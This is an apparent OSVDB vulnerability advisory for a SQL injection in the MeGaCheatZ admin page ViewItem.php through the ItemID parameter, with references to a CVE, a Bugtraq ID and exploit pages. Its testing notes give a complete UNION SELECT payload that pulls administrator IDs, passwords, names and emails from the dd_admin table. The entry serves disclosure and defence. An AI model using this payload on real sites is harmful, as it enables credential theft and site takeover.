MeGaCheatZ siteadmin/ViewItem.php ItemID Variable SQL Injection

2007-12-19T00:00:00
ID: OSVDB:40026
Type: osvdb
Reporter: OSVDB
Modified: 2007-12-19T00:00:00

Description

Manual Testing Notes

http://[target]/siteadmin/ViewItem.php?ItemID='+union+select+1,2,3,4,concat(AdminID,char(58),AdminPass,char(58),AdminName,char(58),AdminEmail),6,7,8,9,10,11,12,13,14,15,16,17,18+from+dd_admin/*

References:

Related OSVDB ID: 1020366
Related OSVDB ID: 1020367
Other Advisory URL: http://www.inj3ct-it.org/exploit/megacheatz.1.1.txt
Generic Exploit URL: http://www.milw0rm.com/exploits/4778
CVE-2007-6557
Bugtraq ID: 26999